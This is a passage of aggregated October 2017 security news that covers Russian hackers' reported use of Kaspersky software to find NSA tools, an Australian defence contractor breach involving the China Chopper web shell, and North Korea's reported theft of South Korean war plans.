The Russian hackers compromised Kaspersky’s servers to harvest any code detected by the antivirus that matched known indicators of compromise for NSA exploits.

“The role of Israeli intelligence in uncovering [the Kaspersky] breach and the Russian hackers’ use of Kaspersky software in the broader search for American secrets have not previously been disclosed,” the NYT reported.

The NSA, the White House and both Israeli and Russian embassies have not commented on the matter.

Kaspersky has published a statement claiming it was not involved in the Russian operation and stating that it was itself a victim of the events.


Kaspersky Lab (@kaspersky)
Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage efforts.
1:16 AM - Oct 11, 2017

“As the integrity of our products is fundamental to our business, Kaspersky Lab patches any vulnerabilities it identifies or that are reported to the company,” the statement said.

“Kaspersky Lab reiterates its willingness to work alongside US authorities to address any concerns they may have about its products as well as its systems, and respectfully requests any relevant, verifiable information that would enable the company to begin an investigation at the earliest opportunity.”

At this time it is not clear what information the Russian hackers exfiltrated, and we will probably never know, but it seems that the Kremlin’s cyber spies remained inside the corporate network for two years.

Eugene Kaspersky announced an internal investigation into the facts reported by the media.

Eugene Kaspersky (@e_kaspersky)
I am launching internal investigation to cross-check. If US LEA has relevant facts - please share.
1:29 AM - Oct 11, 2017

Kaspersky hacked by Russian hackers

In 2015, Kaspersky detected a sophisticated cyber attack against its infrastructure in which the hackers leveraged a sophisticated strain of malware tracked as Duqu.

Experts linked Duqu to the Tilded platform, the same malware factory behind Stuxnet, which is known to have been developed by Israel and the US.

Researchers with Kaspersky named the platform “Tilded” because many of the files in Duqu and Stuxnet have names beginning with the tilde symbol “~” and the letter “d.”

The security firm was also infected by the Duqu 2.0 spyware, which was once again linked to the American-Israeli-developed Stuxnet malware.

In response to the recent revelations about the Kaspersky hack, Symantec CEO Greg Clark told Reuters that his company will no longer let governments inspect its source code.

Other concerns relate to the fact that HPE allowed Russia to review the source code of its ArcSight software, which is also used by the Pentagon.


ASD revealed hacker stole 30GB of sensitive data on Australia’s military capabilities
13.10.2017 securityaffairs BigBrothers

Australia’s foreign intelligence agency, the ASD, has revealed that sensitive military information was stolen by hackers who breached a Department of Defence contractor.
Australia’s foreign intelligence agency, the Australian Signals Directorate (ASD), admitted that a hacker stole over 30 GB of military documents. The stolen data includes details on fighter jets, military aircraft, and naval ships.

The hacker stole the huge trove of confidential data on military capabilities from an unnamed Department of Defence contractor. ASD spokesperson Mitchell Clarke, who revealed the incident, confirmed that no “top secret” data was compromised, but that the breach included sensitive information that is not publicly accessible.

The intelligence agency dubbed the hacker “Alf,” after a character in the “Home and Away” Australian TV soap opera.


The stolen files include confidential information, diagrams, plans and details about the country’s arsenal, such as details on the new F-35 Joint Strike Fighter jet, the Boeing P-8 Poseidon submarine-hunting airplane, Lockheed Martin C-130 transport aircraft, JDAM guided bombs, and data on “some naval ships.”

“That ITAR data included information on the [F-35] Joint Strike Fighters, the C-130, the P-8 Poseidon, the JDAM – that’s a smart bomb – and a few Australian naval vessels,” Mr Clarke said.


According to The Sydney Morning Herald, some of the stolen data was linked to the International Traffic in Arms Regulations, a US regulatory regime.

“A CYBER attack was successfully carried out by hackers who gained access to the computer system of a national security contractor last year.” reported the website news.com.au.

“The Federal Government is set to reveal details about the hack today when Assistant Minister for Cyber Security Dan Tehan launches the Australian Cyber Security Centre’s (ACSC) annual threat report.”

The data breach dates back to July 2016, but the ASD only discovered it in November 2016, when a “partner organization” notified the agency.

According to the ASD, the root cause of the incident was the use of weak passwords for authentication on some of the systems used by the defence contractor.

The defence contractor has roughly 50 employees, and only one of them was tasked with securing its network.

ASD experts who conducted the forensic investigation on the breached servers found evidence of the China Chopper web shell, which is likely associated with the intrusion.

At this time the threat actor’s motivation is still unclear.

“It could have been a state actor, it could have been cyber criminals, and that’s why it was taken so seriously,” Mr Tehan said.

“We’re not 100 per cent sure, and that’s one of the difficulties of this area.”


North Korea Hacked Seoul's War Plans: Report
10.10.2017 securityweek BigBrothers

North Korean computer hackers have stolen hundreds of classified military documents from South Korea including detailed wartime operational plans involving its US ally, a report said Tuesday.

Rhee Cheol-Hee, a lawmaker for the ruling Democratic party, said the hackers had broken into the South's military network last September and gained access to 235 gigabytes of sensitive data, the Chosun Ilbo daily reported.

Among the leaked documents was Operational Plan 5015, to be used in case of war with the North, which includes procedures for "decapitation" attacks on leader Kim Jong-Un, the paper quoted Rhee as saying.

Rhee, a member of parliament's defence committee, could not be reached for comment but his office said he had been quoted correctly.

The report comes amid heightened fears of conflict on the Korean peninsula, fuelled by US President Donald Trump's continued threats of military action against Pyongyang to tame its weapons ambitions.

In his latest tweet over the weekend, Trump reiterated that diplomatic efforts with North Korea have consistently failed, adding that "only one thing will work".

Citing Seoul's defence ministry, Rhee said that 80 percent of the leaked documents had yet to be identified.

But the contingency plan for the South's special forces was stolen, he said, as well as details about annual joint military drills with the US and information on key military facilities and power plants.

A ministry spokesman declined to confirm the report, citing intelligence matters.

In May the ministry said North Korea had hacked into Seoul's military intranet but did not say what had been leaked.

Pyongyang has a 6,800-strong unit of trained cyber-warfare specialists, according to the South Korean government. It has been accused of launching high-profile cyber-attacks including the 2014 hacking of Sony Pictures.

The Chosun Ilbo story was the second report Tuesday of military-related cyber-attacks in the Asia-Pacific.

Australia's government said separately an unidentified defence contractor had been hacked and a "significant amount of data" stolen.

There were 47,000 cyber-incidents in the last 12 months, a 15 percent increase from the previous year, Minister for Cyber Security Dan Tehan said in Canberra as he launched a report by the Cyber Security Centre.

The defence contractor was exploited via an internet-facing server, with the cyber-criminals using remote administrative access to remain in its network, the report said.

The Australian newspaper reported that the hacker was based in China but Tehan told the Australian Broadcasting Corporation that "we don't know and we cannot confirm exactly who the actor was".